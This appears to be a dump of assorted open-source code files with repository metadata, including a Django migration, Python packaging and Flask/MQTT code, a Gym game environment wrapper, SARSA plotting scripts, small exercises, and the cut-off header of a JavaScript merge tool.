src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | 6
|
2021-03-19T10:08:06.000Z
|
2022-02-10T14:03:57.000Z
|
src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.10 on 2020-04-12 13:56
import django.core.validators
from django.db import migrations, models
import django_countries.fields
| 30.138889
| 191
| 0.582488
|
# Generated by Django 2.2.10 on 2020-04-12 13:56
import django.core.validators
from django.db import migrations, models
import django_countries.fields
class Migration(migrations.Migration):
dependencies = [
('account', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='bio',
field=models.TextField(blank=True, max_length=500),
),
migrations.AddField(
model_name='user',
name='birth_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='user',
name='country',
field=django_countries.fields.CountryField(blank=True, max_length=2, null=True),
),
migrations.AddField(
model_name='user',
name='phone',
field=models.CharField(blank=True, max_length=17, null=True, validators=[django.core.validators.RegexValidator(message='it should be: +************', regex='^\\+?1?\\d{9,15}$')]),
),
]
| 0
| 909
| 23
|
d34c7fe1bde2e41f49f5f3ca9ebb728a7f0a3605
| 1,570
|
py
|
Python
|
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | 2
|
2020-10-04T16:58:54.000Z
|
2021-10-04T13:51:10.000Z
|
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | null | null | null |
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | null | null | null |
from setuptools import find_packages, setup
from pathlib import Path
NAME = 'model_lstm'
DESCRIPTION = 'LSTM model which classifies the sentiment of English sentences.'
URL = 'https://github.com/ofbennett/sentiment-analysis-app'
EMAIL = 'contact.me.ob@gmail.com'
AUTHOR = 'Oscar Bennett'
REQUIRES_PYTHON = '>=3.7.0'
ROOT_DIR = Path(__file__).resolve().parent
PACKAGE_DIR = ROOT_DIR / 'model_lstm'
LONG_DESCRIPTION = (PACKAGE_DIR / 'README.md').read_text(encoding='utf-8')
with open(PACKAGE_DIR / 'VERSION') as f:
VERSION = f.read().strip()
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests',)),
package_data={'model_lstm': ['VERSION',
'README.md',
f'trained_models/lstm_model_v{VERSION}.h5',
f'trained_models/lstm_pipeline_v{VERSION}.pkl']},
install_requires=list_reqs(),
extras_require={},
license='MIT',
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
)
| 34.130435
| 82
| 0.652229
|
from setuptools import find_packages, setup
from pathlib import Path
NAME = 'model_lstm'
DESCRIPTION = 'LSTM model which classifies the sentiment of English sentences.'
URL = 'https://github.com/ofbennett/sentiment-analysis-app'
EMAIL = 'contact.me.ob@gmail.com'
AUTHOR = 'Oscar Bennett'
REQUIRES_PYTHON = '>=3.7.0'
ROOT_DIR = Path(__file__).resolve().parent
PACKAGE_DIR = ROOT_DIR / 'model_lstm'
LONG_DESCRIPTION = (PACKAGE_DIR / 'README.md').read_text(encoding='utf-8')
with open(PACKAGE_DIR / 'VERSION') as f:
VERSION = f.read().strip()
def list_reqs(fname='requirements.txt'):
with open(fname) as fd:
return fd.read().splitlines()
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests',)),
package_data={'model_lstm': ['VERSION',
'README.md',
f'trained_models/lstm_model_v{VERSION}.h5',
f'trained_models/lstm_pipeline_v{VERSION}.pkl']},
install_requires=list_reqs(),
extras_require={},
license='MIT',
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
)
| 85
| 0
| 23
|
70753e98dbe35bdd622af25516015fa34134b692
| 4,757
|
py
|
Python
|
domains/domains/ple/ple_env.py
|
ramya-ram/discovering-blind-spots
|
091de837663ff3b0208ea90df9ce7a9eeb6343fe
|
[
"MIT"
] | null | null | null |
domains/domains/ple/ple_env.py
|
ramya-ram/discovering-blind-spots
|
091de837663ff3b0208ea90df9ce7a9eeb6343fe
|
[
"MIT"
] | null | null | null |
domains/domains/ple/ple_env.py
|
ramya-ram/discovering-blind-spots
|
091de837663ff3b0208ea90df9ce7a9eeb6343fe
|
[
"MIT"
] | 3
|
2020-03-13T18:35:31.000Z
|
2020-07-20T03:24:37.000Z
|
import gym
from gym import spaces
from ple import PLE
import numpy as np
| 38.056
| 134
| 0.64074
|
import gym
from gym import spaces
from ple import PLE
import numpy as np
def process_state_prespecified(state):
return np.array([ state.values() ])
def process_state(state):
return np.array(state)
class PLEEnv(gym.Env):
metadata = {'render.modes': ['human', 'rgb_array']}
def __init__(self, prespecified_game=True, game_name='FlappyBird', display_screen=True, rgb_state=False):
# Open up a game state to communicate with emulator
import importlib
if prespecified_game:
game_module_name = ('ple.games.%s' % game_name).lower()
else:
game_module_name = ('domains.ple.%s' % game_name).lower()
game_module = importlib.import_module(game_module_name)
self.game = getattr(game_module, game_name)()
self.rgb_state = rgb_state
if self.rgb_state:
self.game_state = PLE(self.game, fps=30, display_screen=display_screen)
else:
if prespecified_game:
self.game_state = PLE(self.game, fps=30, display_screen=display_screen, state_preprocessor=process_state_prespecified)
else:
self.game_state = PLE(self.game, fps=30, display_screen=display_screen, state_preprocessor=process_state)
self.game_state.init()
self._action_set = self.game_state.getActionSet()
self.action_space = spaces.Discrete(len(self._action_set))
if self.rgb_state:
self.state_width, self.state_height = self.game_state.getScreenDims()
self.observation_space = spaces.Box(low=0, high=255, shape=(self.state_width, self.state_height, 3))
else:
self.state_dim = self.game_state.getGameStateDims()
self.observation_space = spaces.Box(low=0, high=255, shape=self.state_dim)
self.viewer = None
self.feature_bins = []
if hasattr(self.game, 'feature_bins'):
self.feature_bins = self.game.feature_bins
def get_source_state(self, state):
if hasattr(self.game, 'get_source_state'):
return self.game.get_source_state(state)
return None
def generate_training_subset(self, percent_sim_data):
if hasattr(self.game, 'generate_training_subset'):
return self.game.generate_training_subset(percent_sim_data)
def set_to_training_set(self):
if hasattr(self.game, 'set_to_training_set'):
return self.game.set_to_training_set()
def set_to_testing_set(self):
if hasattr(self.game, 'set_to_testing_set'):
return self.game.set_to_testing_set()
def get_uniform_state_weights(self):
if hasattr(self.game, 'get_uniform_state_weights'):
return self.game.get_uniform_state_weights()
else:
states = self.get_states()
weights = np.ones(len(states))
weights = [float(i)/sum(weights) for i in weights]
return states, weights
def get_states(self):
if hasattr(self.game, 'states'):
return self.game.states
def _step(self, a):
reward = self.game_state.act(self._action_set[a])
state = self._get_state()
terminal = self.game_state.game_over()
return state, reward, terminal, {}
def _get_image(self, game_state):
image_rotated = np.fliplr(np.rot90(game_state.getScreenRGB(),3)) # Hack to fix the rotated image returned by ple
return image_rotated
def _get_state(self):
if self.rgb_state:
return self._get_image(self.game_state)
else:
return self.game_state.getGameState()
@property
def _n_actions(self):
return len(self._action_set)
def _reset(self):
if self.rgb_state:
self.observation_space = spaces.Box(low=0, high=255, shape=(self.state_width, self.state_height, 3))
else:
self.observation_space = spaces.Box(low=0, high=255, shape=self.state_dim)
self.game_state.reset_game()
state = self._get_state()
return state
def _render(self, mode='human', close=False):
if close:
if self.viewer is not None:
self.viewer.close()
self.viewer = None
return
img = self._get_image(self.game_state)
if mode == 'rgb_array':
return img
elif mode == 'human':
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(img)
def _seed(self, seed):
rng = np.random.RandomState(seed)
self.game_state.rng = rng
self.game_state.game.rng = self.game_state.rng
self.game_state.init()
| 4,167
| 449
| 69
|
d720558039425b7b46dedfcf73d7c8783c9496cd
| 579
|
py
|
Python
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 115
|
2015-03-23T13:34:42.000Z
|
2022-03-21T00:27:21.000Z
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 56
|
2015-02-25T15:04:26.000Z
|
2022-01-03T07:42:48.000Z
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 59
|
2015-11-26T11:44:51.000Z
|
2022-03-21T00:27:22.000Z
|
#!/usr/bin/env python
if __name__ == '__main__':
from argparse import ArgumentParser
from io import StringIO
import sys
arg_parser = ArgumentParser(description='I/O test')
arg_parser.add_argument('-o', dest='output', help='output file')
options = arg_parser.parse_args()
str_io = StringIO()
for line in ['abc', 'def', 'ghi']:
str_io.write(line + '\n')
if options.output:
output = open(options.output, 'w')
else:
output = sys.stdout
output.write(str_io.getvalue())
if options.output:
output.close()
| 28.95
| 68
| 0.632124
|
#!/usr/bin/env python
if __name__ == '__main__':
from argparse import ArgumentParser
from io import StringIO
import sys
arg_parser = ArgumentParser(description='I/O test')
arg_parser.add_argument('-o', dest='output', help='output file')
options = arg_parser.parse_args()
str_io = StringIO()
for line in ['abc', 'def', 'ghi']:
str_io.write(line + '\n')
if options.output:
output = open(options.output, 'w')
else:
output = sys.stdout
output.write(str_io.getvalue())
if options.output:
output.close()
| 0
| 0
| 0
|
9df7df112f519136b1e342846112fa1c98437980
| 4,102
|
py
|
Python
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 3
|
2022-01-30T18:00:26.000Z
|
2022-01-30T18:03:34.000Z
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 10
|
2022-01-30T21:06:40.000Z
|
2022-02-03T09:42:36.000Z
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 1
|
2022-02-01T12:48:05.000Z
|
2022-02-01T12:48:05.000Z
|
import json
from flask import Flask
from flasgger import Swagger
from globals import connected_devices, Oven
import os
import recipes
import ovens
import recipe_search_online
import db
from mqtt_shared import mqtt_manager, mqtt_topics
from constants import MONGO_URI, MONGO_URI_TEST
import argparse
from spec import SWAGGER_TEMPLATE, dump_apispecs_to_json
from flask_pymongo import PyMongo
swagger = None
# TODO have blueprints in a spepparate module
# Arguments
parser = argparse.ArgumentParser(description="SmartOven Flask server")
parser.add_argument('-t', '--test',
help='Run the server in testing mode',
action="store_true"
)
if __name__ == "__main__":
args = parser.parse_args()
create_app(testing=args.test)
app.run(debug=False)
| 29.941606
| 75
| 0.627986
|
import json
from flask import Flask
from flasgger import Swagger
from globals import connected_devices, Oven
import os
import recipes
import ovens
import recipe_search_online
import db
from mqtt_shared import mqtt_manager, mqtt_topics
from constants import MONGO_URI, MONGO_URI_TEST
import argparse
from spec import SWAGGER_TEMPLATE, dump_apispecs_to_json
from flask_pymongo import PyMongo
swagger = None
# TODO have blueprints in a spepparate module
# Arguments
parser = argparse.ArgumentParser(description="SmartOven Flask server")
parser.add_argument('-t', '--test',
help='Run the server in testing mode',
action="store_true"
)
def create_app(test_config=None, testing=None):
global app, swagger
app = Flask(__name__, instance_relative_config=True)
if not testing:
app.config.from_mapping(
SECRET_KEY='dev',
MONGO_URI=MONGO_URI,
)
else:
app.config.from_mapping(
SECRET_KEY='test',
MONGO_URI=MONGO_URI_TEST,
)
# Setting up Swagger API
app.config['SWAGGER'] = {
'uiversion': 3,
'openapi': '3.0.2'
}
swagger = Swagger(app, template=SWAGGER_TEMPLATE)
if test_config is None:
# load the instance config, if it exists, when not testing
app.config.from_pyfile('config.py', silent=True)
else:
# load the test config if passed in
app.config.from_mapping(test_config)
# Ensure the instance folder exists
try:
os.makedirs(app.instance_path)
except OSError:
pass
db.init_app(app)
# App blueprints
app.register_blueprint(recipes.bp)
app.register_blueprint(ovens.bp)
app.register_blueprint(recipe_search_online.bp)
# Save OpenAPI specs
# with app.app_context():
# dump_apispecs_to_json(swagger)
mqtt_manager.start("server", 1, [
(mqtt_topics.CONNECT, _handle_device_connect),
(mqtt_topics.DISCONNECT, _handle_device_disconnect)
])
return app
def _handle_device_connect(client, userdata, msg):
client_id = client._client_id.decode()
device_id = msg.payload.decode()
if client_id == device_id:
return
if device_id not in connected_devices:
connected_devices[device_id] = Oven(device_id)
print(f'Device connected {device_id}')
'''
new device connected
subscribe and handle messages sent
to it's corresponding topic
'''
def _handle_device_info(client, userdata, msg):
topic = msg.topic
payload = msg.payload.decode()
data = json.loads(payload)
info_type = topic.split('/')[-1]
print(data)
if device_id not in connected_devices:
# TODO logging
print(f'Device {device_id} not connected')
return
device = connected_devices[device_id]
if info_type == 'temperature':
device.temperature = data
elif info_type == 'recipe_details':
device.recipe_info = data
elif info_type == 'time':
device.time = data
elif info_type == 'state':
device.state = data
elif info_type == 'recipe_done':
# can be replace with notifications in production
print(data.get('message', "Recipe done"))
topic = mqtt_topics.INFO_PREFIX.format(device_id=device_id) + "/#"
mqtt_manager.register_callback(topic, _handle_device_info)
def _handle_device_disconnect(client, userdata, msg):
device_id = msg.payload.decode()
connected_devices.pop(device_id, None)
print(f'Device disconnected {device_id}')
topic = mqtt_topics.INFO_PREFIX.format(device_id=device_id) + "/#"
mqtt_manager.unsubscribe(topic)
if __name__ == "__main__":
args = parser.parse_args()
create_app(testing=args.test)
app.run(debug=False)
| 3,227
| 0
| 75
|
cfebce4ce5effba03e6fe213972dd94622cfecd1
| 511
|
py
|
Python
|
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | 3
|
2018-07-31T19:49:43.000Z
|
2019-06-28T20:52:58.000Z
|
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | null | null | null |
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | 1
|
2018-07-28T19:36:48.000Z
|
2018-07-28T19:36:48.000Z
|
tabela = {'2': 'a',
'3':'d',
'5':'j',
'4':'g',
'6':'m',
'7':'p',
'8':'t',
'9': 'w',
'0': ' ',
}
| 22.217391
| 47
| 0.403131
|
tabela = {'2': 'a',
'3':'d',
'5':'j',
'4':'g',
'6':'m',
'7':'p',
'8':'t',
'9': 'w',
'0': ' ',
}
def converte_num_letra(digitos):
palavra = ''
letra = ''
sequencia = ''
for digito in digitos:
if letra != '' and digito != letra:
palavra = palavra + tabela[digito]
elif digito == letra:
sequencia += digito
palavra = palavra + tabela[digito]
return palavra
| 311
| 0
| 23
|
494aaca2f4ace6c6bc7d69520a23e5deddd3db65
| 720
|
py
|
Python
|
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | 1
|
2021-03-27T19:01:49.000Z
|
2021-03-27T19:01:49.000Z
|
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | null | null | null |
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | null | null | null |
# location
location = input("Job Location:\n")
pay = input("Payment:\n")
# Prints For decisions
no = "No thanks,I can find something Better"
doubt = "Without a doubt I'll take it"
sure = "Sure, I can work with that"
no_way = "No way!"
# Try and Except
try:
location = str(location)
pay = float(pay)
except:
print("Error, Invalid input")
# After Except
if location == "Mbarara":
if pay == 4000000:
print(no)
else:
if pay > 4000000:
print(sure)
elif location == "Kampala":
if pay == 10000000:
print(no_way)
else:
if pay >= 10000000:
print(sure)
elif location == "space":
print(doubt)
else:
if pay >= 6000000:
print(sure)
| 21.176471
| 44
| 0.594444
|
# location
location = input("Job Location:\n")
pay = input("Payment:\n")
# Prints For decisions
no = "No thanks,I can find something Better"
doubt = "Without a doubt I'll take it"
sure = "Sure, I can work with that"
no_way = "No way!"
# Try and Except
try:
location = str(location)
pay = float(pay)
except:
print("Error, Invalid input")
# After Except
if location == "Mbarara":
if pay == 4000000:
print(no)
else:
if pay > 4000000:
print(sure)
elif location == "Kampala":
if pay == 10000000:
print(no_way)
else:
if pay >= 10000000:
print(sure)
elif location == "space":
print(doubt)
else:
if pay >= 6000000:
print(sure)
| 0
| 0
| 0
|
ac9894d149ca837137178fd7b2aa80f309e87fd9
| 1,985
|
py
|
Python
|
simple_rest_client/api.py
|
allisson/python-simple-rest-client
|
c5b9a4848adac78212b86ebb736e51e8b50e64d8
|
[
"MIT"
] | 163
|
2017-04-13T21:24:12.000Z
|
2022-02-21T04:55:47.000Z
|
simple_rest_client/api.py
|
allisson/python-simple-rest-client
|
c5b9a4848adac78212b86ebb736e51e8b50e64d8
|
[
"MIT"
] | 39
|
2017-08-02T14:46:12.000Z
|
2021-12-10T12:57:29.000Z
|
simple_rest_client/api.py
|
allisson/python-simple-rest-client
|
c5b9a4848adac78212b86ebb736e51e8b50e64d8
|
[
"MIT"
] | 50
|
2017-06-05T22:39:52.000Z
|
2021-12-26T21:09:52.000Z
|
from slugify import slugify
from .resource import Resource
| 33.644068
| 105
| 0.652393
|
from slugify import slugify
from .resource import Resource
class API:
def __init__(
self,
api_root_url=None,
params=None,
headers=None,
timeout=None,
append_slash=False,
json_encode_body=False,
ssl_verify=None,
):
self.api_root_url = api_root_url
self.params = params or {}
self.headers = headers or {}
self.timeout = timeout
self.append_slash = append_slash
self.json_encode_body = json_encode_body
self.ssl_verify = True if ssl_verify is None else ssl_verify
self._resources = {}
def add_resource(
self,
api_root_url=None,
resource_name=None,
resource_class=None,
params=None,
headers=None,
timeout=None,
append_slash=None,
json_encode_body=None,
ssl_verify=None,
):
resource_class = resource_class or Resource
resource = resource_class(
api_root_url=api_root_url if api_root_url is not None else self.api_root_url,
resource_name=resource_name,
params=params if params is not None else self.params,
headers=headers if headers is not None else self.headers,
timeout=timeout if timeout is not None else self.timeout,
append_slash=append_slash if append_slash is not None else self.append_slash,
json_encode_body=json_encode_body if json_encode_body is not None else self.json_encode_body,
ssl_verify=ssl_verify if ssl_verify is not None else self.ssl_verify,
)
self._resources[resource_name] = resource
resource_valid_name = self.correct_attribute_name(resource_name)
setattr(self, resource_valid_name, resource)
def get_resource_list(self):
return list(self._resources.keys())
def correct_attribute_name(self, name):
slug_name = slugify(name)
return slug_name.replace("-", "_")
| 1,805
| -11
| 130
|
c64480096569db772606bfc626022fbec11fab93
| 1,753
|
py
|
Python
|
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
import tkinter as tk
from Data import Data
from EditClient import EditClient
#Arrumar!
#root = tk.Tk()
#app = SearchDate(master=root)
#app.mainloop()
#data = Data()
#data.db.close()
| 28.274194
| 77
| 0.541928
|
import tkinter as tk
from Data import Data
from EditClient import EditClient
class SearchDate(tk.Frame, Data):
def __init__(self, master=None):
super().__init__(master)
self.frame = tk.Frame(self.master)
self.frame.grid()
self.create_table()
def create_entry(self, row_value, message):
L = tk.Label(self.master, text=message)
L.grid(row=row_value, column=0)
E = tk.Entry(self.master, bd=5)
E.grid(row=row_value, column=1)
return E
def create_table(self):
global E1
E1 = self.create_entry(0, "Data")
B1 = tk.Button(self.master, text="Buscar",
command=self.search_date)
B1.grid(row=0, column=2)
def search_date(self):
parameter = E1.get()
ids = self.contractByDate(parameter)
#print(ids)
self.frame.destroy()
self.frame = tk.Frame(self.master)
self.frame.grid()
i=0
for line in ids:
self.get_contract(line)
self.get_client(self.contract["id_client"])
try:
result = self.client["name"]
except:
result = "(Sem nome)"
button = tk.Button(self.frame, text=result,
command= lambda id_client = self.client["id"]:
self.open_client(id_client))
button.grid()
i=i+1
def open_client(self, id_client):
top = tk.Tk()
client = EditClient(master=top, id_client=id_client)
client.addButtons()
#Arrumar!
#root = tk.Tk()
#app = SearchDate(master=root)
#app.mainloop()
#data = Data()
#data.db.close()
| 1,399
| 12
| 158
|
2d82e8a5afd34b19a82dd079954acdf19ab0b1a0
| 467
|
py
|
Python
|
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | 4
|
2019-11-13T17:58:15.000Z
|
2020-03-12T12:24:10.000Z
|
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | null | null | null |
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | null | null | null |
import boto3
import json
session = boto3.session.Session( profile_name= 'jmcore' )
dynamodb = session.resource( 'dynamodb', region_name= 'eu-west-1' )
table = dynamodb.Table( 'serverless_workshop' )
with open( "user-sets-data.json" ) as json_file:
users = json.load( json_file )
for user in users:
userID = user[ 'userID' ]
sets = user[ 'sets' ]
response = table.put_item(
Item = {
'userID': userID,
'sets': sets
}
)
| 24.578947
| 67
| 0.631692
|
import boto3
import json
session = boto3.session.Session( profile_name= 'jmcore' )
dynamodb = session.resource( 'dynamodb', region_name= 'eu-west-1' )
table = dynamodb.Table( 'serverless_workshop' )
with open( "user-sets-data.json" ) as json_file:
users = json.load( json_file )
for user in users:
userID = user[ 'userID' ]
sets = user[ 'sets' ]
response = table.put_item(
Item = {
'userID': userID,
'sets': sets
}
)
| 0
| 0
| 0
|
d9beda75cf8f601813cb1e0106a06881bcd28dbb
| 4,306
|
py
|
Python
|
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
from sarsa_skel import *
if __name__ == '__main__':
plot_softmax("MiniGrid-Empty-6x6-v0")
| 46.804348
| 105
| 0.51974
|
from sarsa_skel import *
def plot_egreedy(map):
c1 = 0.5
lr1 = 0.1
d1 = 0.99
q01 = 0
steps1, avg_lengths1, avg_returns1 = sarsa_egreedy(map_file=map, learning_rate=lr1,
discount=d1, const=c1, train_episodes=500, q0=q01,
final_show=False)
c2 = 0.5
lr2 = 0.1
d2 = 0.99
q02 = 0.2
steps2, avg_lengths2, avg_returns2 = sarsa_egreedy(map_file=map, learning_rate=lr2,
discount=d2, const=c2, train_episodes=500, q0=q02,
final_show=False)
c3 = 0.5
lr3 = 0.1
d3 = 0.99
q03 = 0.5
steps3, avg_lengths3, avg_returns3 = sarsa_egreedy(map_file=map, learning_rate=lr3,
discount=d3, const=c3, train_episodes=500, q0=q03,
final_show=False)
c4 = 0.5
lr4 = 0.1
d4 = 0.99
q04 = 1
steps4, avg_lengths4, avg_returns4 = sarsa_egreedy(map_file=map, learning_rate=lr4,
discount=d4, const=c4, train_episodes=500, q0=q04,
final_show=False)
_fig, (ax1, ax2) = plt.subplots(ncols=2)
ax1.plot(steps1, avg_lengths1, label="egreedy c:" + str(c1) + " lr=" + str(lr1) + " q0=" + str(q01))
ax1.plot(steps2, avg_lengths2, label="egreedy c:" + str(c2) + " lr=" + str(lr2) + " q0=" + str(q02))
ax1.plot(steps3, avg_lengths3, label="egreedy c:" + str(c3) + " lr=" + str(lr3) + " q0=" + str(q03))
ax1.plot(steps4, avg_lengths4, label="egreedy c:" + str(c4) + " lr=" + str(lr4) + " q0=" + str(q04))
ax1.set_title("Average episode length")
ax1.legend()
ax2.plot(steps1, avg_returns1, label="egreedy c:" + str(c1) + " lr=" + str(lr1) + " q0=" + str(q01))
ax2.plot(steps2, avg_returns2, label="egreedy c:" + str(c2) + " lr=" + str(lr2) + " q0=" + str(q02))
ax2.plot(steps3, avg_returns3, label="egreedy c:" + str(c3) + " lr=" + str(lr3) + " q0=" + str(q03))
ax2.plot(steps4, avg_returns4, label="egreedy c:" + str(c4) + " lr=" + str(lr4) + " q0=" + str(q04))
ax2.set_title("Average episode return")
ax2.legend()
plt.show()
def plot_softmax(map):
lr1 = 0.1
d1 = 0.99
steps1, avg_lengths1, avg_returns1 = sarsa_softmax(map_file=map, learning_rate=lr1,
discount=d1, train_episodes=500, q0=0,
final_show=False)
lr2 = 0.2
d2 = 0.99
steps2, avg_lengths2, avg_returns2 = sarsa_softmax(map_file=map, learning_rate=lr2,
discount=d2, train_episodes=500, q0=0,
final_show=False)
lr3 = 0.4
d3 = 0.99
steps3, avg_lengths3, avg_returns3 = sarsa_softmax(map_file=map, learning_rate=lr3,
discount=d3, train_episodes=500, q0=0,
final_show=False)
lr4 = 0.8
d4 = 0.99
steps4, avg_lengths4, avg_returns4 = sarsa_softmax(map_file=map, learning_rate=lr4,
discount=d4, train_episodes=500, q0=0,
final_show=False)
_fig, (ax1, ax2) = plt.subplots(ncols=2)
ax1.plot(steps1, avg_lengths1, label="softmax lr=" + str(lr1))
ax1.plot(steps2, avg_lengths2, label="softmax lr=" + str(lr2))
ax1.plot(steps3, avg_lengths3, label="softmax lr=" + str(lr3))
ax1.plot(steps4, avg_lengths4, label="softmax lr=" + str(lr4))
ax1.set_title("Average episode length")
ax1.legend()
ax2.plot(steps1, avg_returns1, label="softmax lr=" + str(lr1))
ax2.plot(steps2, avg_returns2, label="softmax lr=" + str(lr2))
ax2.plot(steps3, avg_returns3, label="softmax lr=" + str(lr3))
ax2.plot(steps4, avg_returns4, label="softmax lr=" + str(lr4))
ax2.set_title("Average episode return")
ax2.legend()
plt.show()
if __name__ == '__main__':
plot_softmax("MiniGrid-Empty-6x6-v0")
| 4,162
| 0
| 46
|
47b9a30e8798f592988d1d728ccd51bd10f6cb58
| 958
|
py
|
Python
|
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
#
# @lc app=leetcode id=146 lang=python3
#
# [146] LRU Cache
#
# @lc code=start
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
# @lc code=end
| 22.809524
| 63
| 0.538622
|
#
# @lc app=leetcode id=146 lang=python3
#
# [146] LRU Cache
#
# @lc code=start
class LRUCache:
def __init__(self, capacity: int):
self.cap = capacity
self.d = dict()
self.stack = []
def get(self, key: int):
if key not in self.d:
return -1
self.stack.remove(key)
self.stack.append(key)
return self.d[key]
def put(self, key: int, value: int):
if key in self.d:
self.d[key] = value
self.stack.remove(key)
self.stack.append(key)
else:
if len(self.stack) >= self.cap:
to_delete = self.stack[0]
self.stack = self.stack[1:]
del self.d[to_delete]
self.d[key] = value
self.stack.append(key)
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
# @lc code=end
| 625
| -6
| 103
|
019902fd823def4e117ea65ffc273ad7678112be
| 7,817
|
py
|
Python
|
mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | 1
|
2015-07-17T19:01:07.000Z
|
2015-07-17T19:01:07.000Z
|
mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | null | null | null |
mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
